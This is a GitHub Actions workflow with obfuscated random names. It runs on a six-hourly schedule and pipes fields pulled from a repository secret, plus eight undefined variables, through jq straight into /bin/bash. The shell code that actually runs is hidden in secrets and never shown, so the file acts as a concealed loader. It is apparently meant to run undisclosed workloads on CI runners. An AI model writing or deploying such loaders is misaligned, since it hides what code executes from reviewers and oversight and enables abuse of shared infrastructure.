name: nkchla
on:
  workflow_dispatch:
  schedule:
    - cron: '45 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: nkchla
        env:
          oa1: ${{ secrets.oa1 }}
        run: |
          echo $oa1 | jq -r .knb82427 | /bin/bash
          echo $domkd02308 | jq -r .npk2375 | /bin/bash
          echo $v840 | jq -r .qr4 | /bin/bash
          echo $hm57 | jq -r .e92 | /bin/bash
          echo $junnu50 | jq -r .xcx5438 | /bin/bash
          echo $n4502 | jq -r .e87 | /bin/bash
          echo $rvn510 | jq -r .pxmj9695 | /bin/bash
          echo $gisl0025 | jq -r .f31 | /bin/bash
          echo $hfc35 | jq -r .szqi3457 | /bin/bash

